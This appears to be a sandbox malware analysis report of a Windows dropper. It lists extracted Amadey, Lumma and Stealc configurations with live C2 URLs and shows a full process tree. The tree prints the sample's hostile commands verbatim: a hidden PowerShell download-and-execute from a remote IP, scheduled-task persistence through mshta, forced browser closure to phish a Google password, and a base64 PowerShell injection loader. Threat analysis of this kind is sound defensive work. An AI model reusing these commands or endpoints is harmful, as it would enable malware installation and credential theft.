Analysis

  • max time kernel
    142s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    30/03/2025, 14:24

General

  • Target

    2025-03-30_c3b17afceb80ee32959f39363a6c5833_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    c3b17afceb80ee32959f39363a6c5833

  • SHA1

    f8f30ea8788690a21b19accddfeeb0a451153fcc

  • SHA256

    bf4d126635ad6168fb179b698eb0f603af274e2fddaf2c7fd386106e491a6155

  • SHA512

    c37cadc02fab8f769ffd18013a623fc8a91ee716a8026d0b1e1241943def0447126d06f38b00bce5e2ef07dbd58a913d16d5e3d9ab19a3e6f947b3c4dedee37a

  • SSDEEP

    24576:ZqDEvCTbMWu7rQYlBQcBiT6rprG8a0nu:ZTvC/MTQYxsWR7a0n

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 4 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 18 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 24 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_c3b17afceb80ee32959f39363a6c5833_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_c3b17afceb80ee32959f39363a6c5833_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2884
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn WHH4PmaNKEj /tr "mshta C:\Users\Admin\AppData\Local\Temp\5GoKacj0L.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2952
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn WHH4PmaNKEj /tr "mshta C:\Users\Admin\AppData\Local\Temp\5GoKacj0L.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2088
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\5GoKacj0L.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2824
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KDO8US0NOAXZLRACYTF2DEVM0BJR81XR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2700
        • C:\Users\Admin\AppData\Local\TempKDO8US0NOAXZLRACYTF2DEVM0BJR81XR.EXE
          "C:\Users\Admin\AppData\Local\TempKDO8US0NOAXZLRACYTF2DEVM0BJR81XR.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2360
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Users\Admin\AppData\Local\Temp\10381850101\98aa894168.exe
              "C:\Users\Admin\AppData\Local\Temp\10381850101\98aa894168.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2412
            • C:\Users\Admin\AppData\Local\Temp\10381860101\19114c195b.exe
              "C:\Users\Admin\AppData\Local\Temp\10381860101\19114c195b.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1820
            • C:\Users\Admin\AppData\Local\Temp\10381870101\08962ffdb3.exe
              "C:\Users\Admin\AppData\Local\Temp\10381870101\08962ffdb3.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:1496
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1040
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1656
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:788
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1988
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2672
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:664
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  8⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:2796
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.0.79474184\239128106" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1240 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3fd89dac-490f-49c1-a089-c11ef9741ef0} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1348 10af5958 gpu
                    9⤵
                      PID:2156
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.1.766817554\1163736303" -parentBuildID 20221007134813 -prefsHandle 1516 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e7f4ce2a-e0a0-4784-b748-cf50e6fd980f} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1528 e73c58 socket
                      9⤵
                        PID:1132
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.2.1048794049\1638787729" -childID 1 -isForBrowser -prefsHandle 2000 -prefMapHandle 1996 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3b18583c-92bd-4aaa-ba85-3241971ae6af} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 1972 10a61158 tab
                        9⤵
                          PID:2372
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.3.1818945029\46084899" -childID 2 -isForBrowser -prefsHandle 2740 -prefMapHandle 2736 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5998861f-fa9c-48d7-ae39-92805214c48c} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 2752 e5d258 tab
                          9⤵
                            PID:1280
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.4.1981554477\632136766" -childID 3 -isForBrowser -prefsHandle 1112 -prefMapHandle 3488 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3762be1c-ee3f-48cb-a32c-fc315b6e95e0} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3672 10af5658 tab
                            9⤵
                              PID:1212
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.5.1278352978\839025101" -childID 4 -isForBrowser -prefsHandle 3824 -prefMapHandle 3828 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4a38533e-c0ff-475f-9b88-576c27cef4ce} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3812 1d6d9858 tab
                              9⤵
                                PID:2692
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2796.6.2117676526\1892068183" -childID 5 -isForBrowser -prefsHandle 4004 -prefMapHandle 4008 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3f05c77-b82b-42cc-a551-73eac25062e1} 2796 "\\.\pipe\gecko-crash-server-pipe.2796" 3992 1ec26d58 tab
                                9⤵
                                  PID:1772
                          • C:\Users\Admin\AppData\Local\Temp\10381880101\c9c7f0ab08.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381880101\c9c7f0ab08.exe"
                            6⤵
                            • Modifies Windows Defender DisableAntiSpyware settings
                            • Modifies Windows Defender Real-time Protection settings
                            • Modifies Windows Defender TamperProtection settings
                            • Modifies Windows Defender notification settings
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Windows security modification
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:788
                          • C:\Users\Admin\AppData\Local\Temp\10381890101\c24892eea3.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381890101\c24892eea3.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3196
                          • C:\Users\Admin\AppData\Local\Temp\10381900101\c927d0c717.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381900101\c927d0c717.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3444
                          • C:\Users\Admin\AppData\Local\Temp\10381910101\ef27b08794.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381910101\ef27b08794.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3688
                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381910101\ef27b08794.exe"
                              7⤵
                              • Downloads MZ/PE file
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3852
                          • C:\Users\Admin\AppData\Local\Temp\10381920101\b38b07c84e.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381920101\b38b07c84e.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Loads dropped DLL
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of SetThreadContext
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3092
                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                              "C:\Users\Admin\AppData\Local\Temp\10381920101\b38b07c84e.exe"
                              7⤵
                              • Downloads MZ/PE file
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3392
                          • C:\Users\Admin\AppData\Local\Temp\10381930101\97a6af6f7d.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381930101\97a6af6f7d.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2404
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 2404 -s 64
                              7⤵
                              • Loads dropped DLL
                              PID:2652
                          • C:\Users\Admin\AppData\Local\Temp\10381940101\331f54e8f5.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381940101\331f54e8f5.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3324
                          • C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381950101\EPTwCQd.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:3780
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 3780 -s 28
                              7⤵
                              • Loads dropped DLL
                              PID:3812
                          • C:\Users\Admin\AppData\Local\Temp\10381960101\787cf349f0.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381960101\787cf349f0.exe"
                            6⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Writes to the Master Boot Record (MBR)
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1756
                          • C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381970101\u75a1_003.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3192
                          • C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381980101\7IIl2eE.exe"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in Windows directory
                            • System Location Discovery: System Language Discovery
                            PID:3412
                            • C:\Windows\SysWOW64\CMD.exe
                              "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                              7⤵
                              • Loads dropped DLL
                              • System Location Discovery: System Language Discovery
                              PID:3484
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                8⤵
                                • Enumerates processes with tasklist
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3136
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr /I "opssvc wrsa"
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:3168
                              • C:\Windows\SysWOW64\tasklist.exe
                                tasklist
                                8⤵
                                • Enumerates processes with tasklist
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2268
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:3516
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c md 418377
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:3508
                              • C:\Windows\SysWOW64\extrac32.exe
                                extrac32 /Y /E Leon.cab
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:1668
                              • C:\Windows\SysWOW64\findstr.exe
                                findstr /V "BEVERAGES" Compilation
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:3308
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:3368
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:3724
                              • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                Passwords.com N
                                8⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of SendNotifyMessage
                                PID:3624
                              • C:\Windows\SysWOW64\choice.exe
                                choice /d y /t 5
                                8⤵
                                • System Location Discovery: System Language Discovery
                                PID:1240
                          • C:\Users\Admin\AppData\Local\Temp\10381990101\TbV75ZR.exe
                            "C:\Users\Admin\AppData\Local\Temp\10381990101\TbV75ZR.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:3760
                            • C:\Windows\system32\WerFault.exe
                              C:\Windows\system32\WerFault.exe -u -p 3760 -s 44
                              7⤵
                              • Loads dropped DLL
                              PID:3800
                          • C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe
                            "C:\Users\Admin\AppData\Local\Temp\10382000101\Rm3cVPI.exe"
                            6⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:3860
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:3144
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10382011121\5YB5L4K.cmd"
                              7⤵
                              • System Location Discovery: System Language Discovery
                              PID:3216
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06